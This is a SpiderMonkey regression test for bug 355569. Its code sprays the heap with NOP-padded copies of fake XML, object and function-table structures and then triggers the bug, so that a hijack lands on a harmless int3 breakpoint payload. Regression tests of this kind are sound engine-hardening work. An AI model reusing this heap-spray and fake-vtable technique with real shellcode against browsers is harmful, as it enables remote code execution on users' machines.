/* -*- indent-tabs-mode: nil; js-indent-level: 4 -*- */
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
// Bug 355569 regression test.  The harness variables are left empty on
// purpose: there is no value to compare, the test passes simply by running
// through to reportCompare() without the engine crashing or trapping.
var BUGNUMBER = 355569;
var summary = '';
var expect = '';
var actual = '';
printBugNumber(BUGNUMBER);
printStatus(summary);

// Address the fake structures are laid out for.  Nothing in this file
// verifies that the spray actually covers it; chunkAlign below is what is
// meant to make the payload repeat at every 0x1000-byte boundary.
var targetAddress = 0x12030010;

// Spray geometry, consumed by sprayData().  Sizes are in bytes (the sprayed
// strings are built at two bytes per UTF-16 code unit):
//   chunkSize    bytes per sprayed string (16 MiB), chunkCount of them
//   chunkMarker  32-bit tag written at the start of every chunk
//   chunkAlign   period the payload is padded to, so copies of the fake
//                structures recur at that interval inside each chunk
//   reservedSize bytes held back from each chunk's payload -- presumably
//                headroom for the engine's own string overhead; the value
//                is not derived from anything visible here
var sprayParams = {
    chunkSize: 1 << 24,
    chunkCount: 16,
    chunkMarker: 0xdeadface,
    chunkAlign: 0x1000,
    reservedSize: 1024
};
/**
 * Returns the x86 payload placed at the "exploit-code" label, encoded two
 * bytes per UTF-16 code unit (low byte first) so it can be spliced into a
 * JS string.  Bytes: B8 ED FE AD DE (mov eax, 0xdeadfeed), 89 C3 / 89 C1 /
 * 89 C2 (mov ebx/ecx/edx, eax), CC (int3).  The payload only loads a
 * recognisable constant into four registers and traps; it executes nothing
 * further, so a successful hijack shows up as a breakpoint, not as code
 * execution.  The argument some callers pass is ignored.
 */
function makeExploitCode() {
    var bytes = [0xB8, 0xED, 0xFE, 0xAD, 0xDE,   // mov eax, 0xdeadfeed
                 0x89, 0xC3,                     // mov ebx, eax
                 0x89, 0xC1,                     // mov ecx, eax
                 0x89, 0xC2,                     // mov edx, eax
                 0xCC];                          // int3
    var units = [];
    for (var i = 0; i < bytes.length; i += 2) {
        // little-endian pairing: low byte first, high byte second
        units.push(bytes[i] | (bytes[i + 1] << 8));
    }
    return String.fromCharCode.apply(null, units);
}
/*==========================================================================*/
/*==========================================================================*/
/**
 * Serialises the values in `A` according to `template`, two bytes per
 * UTF-16 code unit with the low byte first.  Only a little-endian encoding
 * exists; the original "XXX endian" remark flags that no big-endian
 * variant was written.
 *   'l' / 'L'  32-bit word, consumes one value
 *   's' / 'S'  16-bit half-word, consumes one value
 *   '='        raw text, appends String(value) unchanged
 * Any other character (the T_* helpers use spaces as visual separators) is
 * skipped and consumes nothing.  Numeric values are coerced with `>>> 0`,
 * so negatives wrap and missing entries become 0.  `A` may be an Array or
 * an `arguments` object; entries beyond what the template consumes are
 * ignored.
 */
function packData(template, A) {
    var out = "";
    var next = 0;
    var take = function () { return A[next++]; };
    for (var i = 0; i < template.length; i++) {
        switch (template.charAt(i)) {
        case "s":
        case "S": {
            var half = take() >>> 0;
            out += String.fromCharCode(half & 0xffff);
            break;
        }
        case "l":
        case "L": {
            var word = take() >>> 0;
            // fromCharCode keeps only the low 16 bits of each argument
            out += String.fromCharCode(word & 0xffff, word >>> 16);
            break;
        }
        case "=":
            out += String(take());
            break;
        default:
            break;
        }
    }
    return out;
}
/**
 * Lays out the pieces appended by `worker` into one string and resolves
 * cross-references between them.  `worker(ctx)` runs twice: the first pass
 * only records each label's byte offset (ctx.address() answers with what is
 * known so far, i.e. plain `address` for a label not yet appended); the
 * second pass rebuilds the string with every offset known.  `worker` must
 * append the same labels in the same order on both passes, otherwise the
 * recorded offsets are stale.
 *
 * ctx.append(label, str)  appends `str`, recording its offset in bytes
 *                         (2 * code units) under `label`
 * ctx.address(label)      `address` + offset of `label`; just `address`
 *                         for an unknown, omitted or not-yet-seen label
 */
function buildStructure(worker, address) {
    var offsets = {};
    var buf = "";
    var ctx = {
        append: function (label, str) {
            offsets[label] = buf.length * 2;
            buf += str;
        },
        address: function (label) {
            var off = label ? offsets[label] : undefined;
            return address + (off || 0);
        }
    };
    worker(ctx);        // pass 1: learn the offsets
    buf = "";
    worker(ctx);        // pass 2: emit with resolved addresses
    return buf;
}
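/**
 * Returns `s` repeated/truncated to exactly `L` code units.  An `L` at or
 * below s.length (including 0 or a negative value) just truncates; a larger
 * `L` tiles `s` and cuts the final copy short.
 *
 * Throws RangeError when `s` is empty and L > 0: no string of that length
 * can be built from it, and the doubling loop below would otherwise never
 * terminate (the previous version spun forever on that input).
 */
function repeatToLength(s, L) {
    if (L <= s.length) {
        return s.substring(0, L);
    }
    if (s.length === 0) {
        throw new RangeError("repeatToLength: cannot extend an empty string");
    }
    // Double until one more doubling would exceed L, then top up with a
    // prefix; keeps the number of concatenations logarithmic in L.
    while (s.length <= L / 2) {
        s += s;
    }
    return s + s.substring(0, L - s.length);
}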
/**
 * Fills `rooter[0..chunkCount-1]` with large strings so that copies of
 * `data` cover a wide, predictable range of the heap.  Each string is:
 * marker (32-bit chunkMarker) + `data` tiled to (chunkSize - reservedSize)
 * bytes + the chunk index.  `data` is first padded with 0x9090 code units
 * (0x90 is the x86 nop) up to chunkAlign bytes, so the tiling period equals
 * the alignment.  If `data` already exceeds chunkAlign/2 code units no
 * padding is added and that period guarantee silently goes away -- nothing
 * here checks for it.  `rooter` exists only to keep the strings reachable
 * so the GC cannot reclaim the spray before it is used.
 */
function sprayData(data, params, rooter) {
    var marker = packData("L", [params.chunkMarker]);
    var alignUnits = params.chunkAlign / 2;
    var bodyUnits = (params.chunkSize - params.reservedSize) / 2;
    var aligned = data + repeatToLength("\u9090", alignUnits - data.length);
    var body = repeatToLength(aligned, bodyUnits);
    var i = 0;
    while (i < params.chunkCount) {
        rooter[i] = marker + body + i;   // trailing index keeps each string distinct
        i++;
    }
}
/** Packs the two 32-bit fields of the JSObject layout this test assumes. */
function T_JSObject(map, slots) {
    var fields = [map, slots];
    return packData("LL", fields);
}
/** Packs the four 32-bit fields of the JSObjectMap layout this test assumes. */
function T_JSObjectMap(nrefs, ops, nslots, freeslot) {
    var fields = [nrefs, ops, nslots, freeslot];
    return packData("LLLL", fields);
}
/**
 * Packs the 24 function-pointer slots of the JSObjectOps layout this test
 * assumes (32-bit, in the order listed).  makeExploitData() fills only
 * getRequiredSlot and leaves every other slot zero.
 */
function T_JSObjectOps(
    newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
    getProperty, setProperty, getAttributes, setAttributes,
    deleteProperty, defaultValue, enumerate, checkAccess,
    thisObject, dropProperty, call, construct,
    xdrObject, hasInstance, setProto, setParent,
    mark, clear, getRequiredSlot, setRequiredSlot
) {
    var slots = [
        newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
        getProperty, setProperty, getAttributes, setAttributes,
        deleteProperty, defaultValue, enumerate, checkAccess,
        thisObject, dropProperty, call, construct,
        xdrObject, hasInstance, setProto, setParent,
        mark, clear, getRequiredSlot, setRequiredSlot
    ];
    return packData("LLLLLLLL LLLLLLLL LLLLLLLL", slots);
}
/**
 * Packs the JSXML "list" layout this test assumes: four 32-bit words, two
 * 16-bit half-words (xml_class, xml_flags), then six more 32-bit words.
 */
function T_JSXML_LIST(
    object, domnode, parent, name, xml_class, xml_flags,
    kids_length, kids_capacity, kids_vector, kids_cursors,
    xml_target, xml_targetprop
) {
    var fields = [
        object, domnode, parent, name, xml_class, xml_flags,
        kids_length, kids_capacity, kids_vector, kids_cursors,
        xml_target, xml_targetprop
    ];
    return packData("LLLLSS LLLL LL", fields);
}
/**
 * Packs the JSXML "element" layout this test assumes: the same header as
 * T_JSXML_LIST (four words, two half-words) followed by three
 * length/capacity/vector/cursors quadruples for kids, namespaces and
 * attributes.
 */
function T_JSXML_ELEMENT(
    object, domnode, parent, name, xml_class, xml_flags,
    kids_length, kids_capacity, kids_vector, kids_cursors,
    nses_length, nses_capacity, nses_vector, nses_cursors,
    atrs_length, atrs_capacity, atrs_vector, atrs_cursors
) {
    var fields = [
        object, domnode, parent, name, xml_class, xml_flags,
        kids_length, kids_capacity, kids_vector, kids_cursors,
        nses_length, nses_capacity, nses_vector, nses_cursors,
        atrs_length, atrs_capacity, atrs_vector, atrs_cursors
    ];
    return packData("LLLLSS LLLL LLLL LLLL", fields);
}
/*==========================================================================*/
/*==========================================================================*/
/**
 * Builds the fake object graph that gets sprayed so that it sits at
 * `address`.  The pieces are laid out back to back in this order, with every
 * pointer field resolved relative to `address` by buildStructure():
 *
 *   xml-list         JSXML list with kids_length 1, kids_vector -> xml-kids-vector
 *   xml-kids-vector  a single pointer -> xml-element
 *   xml-element      JSXML element (xml_class 1) whose object -> object
 *   object           JSObject whose map -> object-map
 *   object-map       JSObjectMap whose ops -> object-ops
 *   object-ops       JSObjectOps, all slots zero except getRequiredSlot
 *                    (23rd of 24) -> exploit-code
 *   exploit-code     the int3 payload from makeExploitCode()
 *
 * Presumably an engine that misreads `address` as a JSXML list and then
 * invokes getRequiredSlot on the contained object would jump into
 * exploit-code; which engine path does that is not visible here.  All
 * structure sizes are the 32-bit layouts hard-coded in the T_* helpers.
 */
function makeExploitData(address) {
    return buildStructure(function (ctx) {
        var at = ctx.address;   // both helpers close over their state, no `this`
        var put = ctx.append;

        put("xml-list", T_JSXML_LIST(
            0, 0, 0, 0, 0, 0,                 // object, domnode, parent, name, class, flags
            1, 0, at("xml-kids-vector"), 0,   // kids: length 1, vector -> next piece
            0, 0));                           // target, targetprop
        put("xml-kids-vector", packData("L", [at("xml-element")]));
        put("xml-element", T_JSXML_ELEMENT(
            at("object"), 0, 0, 0, 1, 0,      // object -> fake JSObject, xml_class 1
            0, 0, 0, 0,                       // kids
            0, 0, 0, 0,                       // nses
            0, 0, 0, 0));                     // atrs
        put("object", T_JSObject(at("object-map"), 0));
        put("object-map", T_JSObjectMap(0, at("object-ops"), 0, 0));
        put("object-ops", T_JSObjectOps(
            0, 0, 0, 0, 0, 0, 0, 0,
            0, 0, 0, 0, 0, 0, 0, 0,
            0, 0, 0, 0, 0, 0,
            at("exploit-code"),               // getRequiredSlot
            0));                              // setRequiredSlot
        put("exploit-code", makeExploitCode(ctx));
    }, address);
}
/**
 * Runs the spray, then performs the single operation bug 355569 is about:
 * constructing a Number object from `targetAddress >> 1`.  The shift
 * suggests the value is meant to be read back as a tagged int jsval whose
 * raw bits, tag masked off, equal targetAddress -- i.e. the bug presumably
 * confused a Number with an XML object and dereferenced that "pointer" into
 * the sprayed fake structures.  None of that is verifiable from this file,
 * hence the status message.  The spray is parked on `this.rooter` (the
 * global object when called as a plain function, as it is below) so it
 * stays reachable after this returns.  On a fixed engine this is a no-op.
 */
function exploit() {
    var payload = makeExploitData(targetAddress);   // built before rooter is assigned, as before
    var keep = this.rooter = {};
    sprayData(payload, sprayParams, keep);
    var numobj = new Number(targetAddress >> 1);    // the trigger; the object itself is unused
    printStatus("probably not exploitable");
}
// The attempt is wrapped so that an ordinary JS exception (e.g. an engine
// refusing to build the very large spray strings) does not fail the test.
// What is under test is "does the engine crash or trap", and no catch can
// mask that; swallowing the exception here is deliberate, not an oversight.
try {
    exploit();
} catch (ex) {
    // intentionally ignored, see above
}
reportCompare(expect, actual);